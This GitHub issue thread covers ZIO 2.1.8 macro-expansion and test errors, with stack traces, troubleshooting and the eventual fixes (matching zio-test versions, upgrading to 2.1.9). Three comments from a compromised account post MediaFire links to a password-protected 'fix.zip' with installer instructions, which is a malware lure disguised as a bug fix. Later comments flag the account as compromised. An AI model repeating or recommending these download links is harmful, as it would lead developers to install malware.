### ISSUE TITLE
Release 2.1.8 introduces exception in macro expansion.

### ISSUE THREAD

**Issue by RobVermazeren** [zio/zio#9145]
We see several projects where the ZIO `2.1.8` update builds are failing.

Test code does not compile. Error reported:
```
exception during macro expansion: 
[error] java.lang.Throwable: This can't happen
[error] 	at zio.internal.macros.Graph.$anonfun$build$1(Graph.scala:147)
[error] 	at zio.internal.macros.Graph.build(Graph.scala:189)
[error] 	at zio.internal.macros.Graph.$anonfun$buildNodes$5(Graph.scala:29)
[error] 	at zio.internal.macros.Graph.$anonfun$buildNodes$2(Graph.scala:28)
[error] 	at zio.internal.macros.Graph.buildNodes(Graph.scala:27)
[error] 	at zio.internal.macros.LayerBuilder.build(LayerBuilder.scala:93)
[error] 	at zio.internal.macros.LayerMacroUtils.constructLayer(LayerMacroUtils.scala:131)
[error] 	at zio.internal.macros.LayerMacroUtils.constructLayer$(LayerMacroUtils.scala:41)
[error] 	at zio.internal.macros.LayerMacros.constructLayer(LayerMacros.scala:9)
[error] 	at zio.internal.macros.LayerMacroUtils.provideBaseImpl(LayerMacroUtils.scala:139)
[error] 	at zio.internal.macros.LayerMacroUtils.provideBaseImpl$(LayerMacroUtils.scala:134)
[error] 	at zio.internal.macros.LayerMacros.provideBaseImpl(LayerMacros.scala:9)
[error] 	at zio.internal.macros.LayerMacros.provideSomeImpl(LayerMacros.scala:36)
[error]     ).provideSome(TestImageConsumer.layer) @@ TestAspect.before(emptyLocalFiles() *> clearRemote()) @@
[error]                  ^
```

**Comment by guizmaii** [comment]
See also: https://github.com/zio/zio/pull/9077#issuecomment-2309606487

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pablf** [comment]
@RobVermazeren Would you mind sharing some build details and scala version?

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobVermazeren** [comment]
Scala version is `2.13.14`.

**Comment by RobVermazeren** [comment]
I have seen this exception occur for `provide` and `provideSome` (in tests).

**Comment by RobVermazeren** [comment]
These builds are all multiple projects, structured like:
```
root
application
integration-tests
lib-1
lib-2
...
lib-n
```
I have seen this error occur in the tests inside `application` and `integration-tests`.

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by guizmaii** [comment]
> DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS

Yes, I deleted your comment yesterday. It was highly suspicious and without any link to this ticket.

**Comment by RobVermazeren** [comment]
I don't know if this is related, but we also have some projects where the running of `test` fails for the `2.1.8` update branch.
So after entering `test` in sbt we see the error:
```
[error] Exception in thread "zio-fiber-1834380461,394448945,558798678,1009396526" java.lang.NoSuchMethodError: 'zio.ZIO zio.ZIO$.$anonfun$uninterruptible$1(scala.Function0, java.lang.Object)'
[error] 	at zio.test.results.ResultFileOps$Json$.apply(ResultFileOps.scala:82)
[error] 	at zio.test.results.ResultFileOps$.$anonfun$live$1(ResultFileOps.scala:15)
[error] 	at zio.ZLayer$ScopedPartiallyApplied$.$anonfun$apply$extension$1(ZLayer.scala:2027)
[error] 	at zio.ZLayer$ScopedEnvironmentPartiallyApplied$.$anonfun$apply$extension$2(ZLayer.scala:2034)
[error] 	at zio.ZLayer.$anonfun$scope$17(ZLayer.scala:431)
[error] 	at zio.ZLayer$MemoMap$$anon$25.$anonfun$getOrElseMemoize$17(ZLayer.scala:1986)
[error] Exception in thread "zio-fiber-734856381,1009396526" java.lang.InterruptedException: Interrupted by thread "zio-fiber-1009396526"
[error] 	Suppressed: java.lang.InterruptedException: Interrupted by thread "zio-fiber-1009396526"
[error] 		Suppressed: java.lang.InterruptedException: Interrupted by thread "zio-fiber-1009396526"
[error] 			Suppressed: java.lang.InterruptedException: Interrupted by thread "zio-fiber-1009396526"
[error] 				Suppressed: java.lang.InterruptedException: Interrupted by thread "zio-fiber-1009396526"
[error] Caused by: java.lang.NoSuchMethodError: 'zio.ZIO zio.ZIO$.$anonfun$uninterruptible$1(scala.Function0, java.lang.Object)'
[error] 	at zio.test.results.ResultFileOps$Json$.apply(ResultFileOps.scala:82)
[error] 	at zio.test.results.ResultFileOps$.$anonfun$live$1(ResultFileOps.scala:15)
[error] 	at zio.ZLayer$ScopedPartiallyApplied$.$anonfun$apply$extension$1(ZLayer.scala:2027)
[error] 	at zio.ZLayer$ScopedEnvironmentPartiallyApplied$.$anonfun$apply$extension$2(ZLayer.scala:2034)
[error] 	at zio.ZLayer.$anonfun$scope$17(ZLayer.scala:431)
[error] 	at zio.ZLayer$MemoMap$$anon$25.$anonfun$getOrElseMemoize$17(ZLayer.scala:1986)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1077)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1162)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1097)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1067)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1067)
[error] 	at zio.internal.FiberRuntime.runLoop(FiberRuntime.scala:1162)
[error] 	at zio.internal.FiberRuntime.evaluateEffect(FiberRuntime.scala:413)
[error] 	at zio.internal.FiberRuntime.evaluateMessageWhileSuspended(FiberRuntime.scala:489)
[error] 	at zio.internal.FiberRuntime.drainQueueOnCurrentThread(FiberRuntime.scala:250)
[error] 	at zio.internal.FiberRuntime.run(FiberRuntime.scala:138)
[error] 	at zio.internal.ZScheduler$$anon$3.run(ZScheduler.scala:380)

```

**Comment by kyri-petrou** [comment]
> I don't know if this is related, but we also have some projects where the running of `test` fails for the `2.1.8` update branch. So after entering `test` in sbt we see the error:

@RobVermazeren this is definitely something different. There are a few things which might be causing this:
1. (Hopefully) It's an incremental compilation error. Did you observe this locally or in CI? If locally, then try running `sbt clean` and try again. If in CI, do you by any chance cache some state to speed up CI (e.g., the `/target` directories?)
2. We somehow broke binary compatibility with [this change](https://github.com/zio/zio/commit/a5d5de19e2a6dc389709fe3f97d2fc076d06697e#diff-55db93d1616fb3c94a9699b1194a5778e50bc20c9390fe5ed3a5671cafa330c1R4906). I really can't see how that could happen though since the method signature was not changed 😨.

If you're certain that this is not related to (1) could you please open a separate issue so we can discuss it separately?

**Comment by RobVermazeren** [comment]
At work we have many ZIO projects. For some the update to `2.1.8` goes fine. For some we see the error during macro expansion in tests. And for some we get an error when running `test`.

Regarding the latter. We get this error locally and on CI. `sbt clean` does not solve it. (It only makes the error report longer.)
I will look at this more closely and create an new issue if we think the problem is related to the new release.

**Comment by kyri-petrou** [comment]
@RobVermazeren Any chance that `zio-test` is on a different version than `zio`? That's the only thing left I can think of that would explain this :/ Otherwise I fear there might be some issue with method inlining/optimizations done by the compiler along with the usage of macros

**Comment by butcherless** [comment]
Hello everyone. I get a similar error if it helps. Using ZLayer.make[T]. It works with previous version 2.1.7. It was in compilation phase.

[error] -- Error: /home/runner/work/dependency-analyzer/dependency-analyzer/application/src/main/scala/com/cmartin/utils/config/ConfigHelper.scala:61:40 
[error] 61 |    ZLayer.make[ApplicationDependencies](
[error]    |    ^
[error]    |Exception occurred while executing macro expansion.
[error]    |java.lang.Error: NOT LIKE THIS
[error]    |	at zio.internal.macros.RenderedGraph$Value.$greater$greater$greater(RenderedGraph.scala:28)
[error]    |	at zio.internal.macros.LayerBuilder.$anonfun$30(LayerBuilder.scala:251)
[error]    |	at zio.internal.macros.LayerTree.fold(LayerTree.scala:20)
[error]    |	at zio.internal.macros.LayerBuilder.debugLayer(LayerBuilder.scala:251)
[error]    |	at zio.internal.macros.LayerBuilder.build$$anonfun$1(LayerBuilder.scala:101)
[error]    |	at scala.runtime.function.JProcedure1.apply(JProcedure1.java:15)
[error]    |	at scala.runtime.function.JProcedure1.apply(JProcedure1.java:10)
[error]    |	at scala.Option.foreach(Option.scala:437)
[error]    |	at zio.internal.macros.LayerBuilder.build(LayerBuilder.scala:101)
[error]    |	at zio.internal.macros.LayerMacroUtils$.constructLayer$$anonfun$1$$anonfun$1(LayerMacroUtils.scala:110)
[error]    |	at zio.internal.macros.LayerMacroUtils$.constructLayer$$anonfun$1(LayerMacroUtils.scala:110)
[error]    |	at zio.internal.macros.LayerMacroUtils$.constructLayer$$anonfun$adapted$1(LayerMacroUtils.scala:110)
[error]    |	at dotty.tools.dotc.quoted.PickledQuotes$$anon$1.transform(PickledQuotes.scala:111)
[error]    |	at dotty.tools.dotc.ast.Trees$Instance$TreeMap.transform(Trees.scala:1568)
[error]    |	at dotty.tools.dotc.quoted.PickledQuotes$$anon$1.transform(PickledQuotes.scala:136)
[error]    |	at dotty.tools.dotc.ast.tpd$TreeMapWithPreciseStatContexts.transformBlock$$anonfun$1$$anonfun$1(tpd.scala:1245)
[error]    |	at dotty.tools.dotc.ast.tpd$TreeMapWithPreciseStatContexts.loop$2(tpd.scala:1227)
[error]    |	at dotty.tools.dotc.ast.tpd$TreeMapWithPreciseStatContexts.transformStats(tpd.scala:12[40](https://github.com/butcherless/dependency-analyzer/actions/runs/10538338577/job/29200747431#step:5:41))
[error]    |	at dotty.tools.dotc.ast.tpd$TreeMapWithPreciseStatContexts.transformBlock(tpd.scala:1245)
[error]    |	at dotty.tools.dotc.ast.Trees$Instance$TreeMap.transform(Trees.scala:1548)
[error]    |	at dotty.tools.dotc.quoted.PickledQuotes$$anon$1.transform(PickledQuotes.scala:136)
[error]    |	at dotty.tools.dotc.quoted.PickledQuotes$.spliceTerms(PickledQuotes.scala:153)
[error]    |	at dotty.tools.dotc.quoted.PickledQuotes$.unpickleTerm(PickledQuotes.scala:89)
[error]    |	at scala.quoted.runtime.impl.QuotesImpl.unpickleExprV2(QuotesImpl.scala:3259)
[error]    |	at zio.internal.macros.LayerMacroUtils$.constructLayer(LayerMacroUtils.scala:110)
[error]    |	at zio.internal.macros.LayerMacros$.constructLayer(LayerMacros.scala:19)
[error]    |
[error] 62 |      ZLayer.succeed(Clock.ClockLive),
[error] 63 |      FileManager.layer,
[error] 64 |      DependencyLogicManager.layer,
[error] 65 |      ZioHttpManager.layer,
[error] 66 |      clientBackendLayer,
[error] 67 |      ZLayer.Debug.mermaid
[error] 68 |    )
[error]    |----------------------------------------------------------------------------
[error]    |Inline stack trace
[error]    |- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[error]    |This location contains code that was inlined from ZLayerCompanionVersionSpecific.scala:8
[error]     ----------------------------------------------------------------------------

**Comment by RobVermazeren** [comment]
> @RobVermazeren Any chance that `zio-test` is on a different version than `zio`? That's the only thing left I can think of that would explain this :/ Otherwise I fear there might be some issue with method inlining/optimizations done by the compiler along with the usage of macros

@kyri-petrou You were right! :+1:  The `sbt test` error was indeed caused by the combination of `zio 2.1.8` and `zio-test 2.1.7`. 
That leaves the macro expansion error.

**Comment by strokyl** [comment]
Got similar issues.

**Comment by strokyl** [comment]
`2.1.9` solved the issue for me too
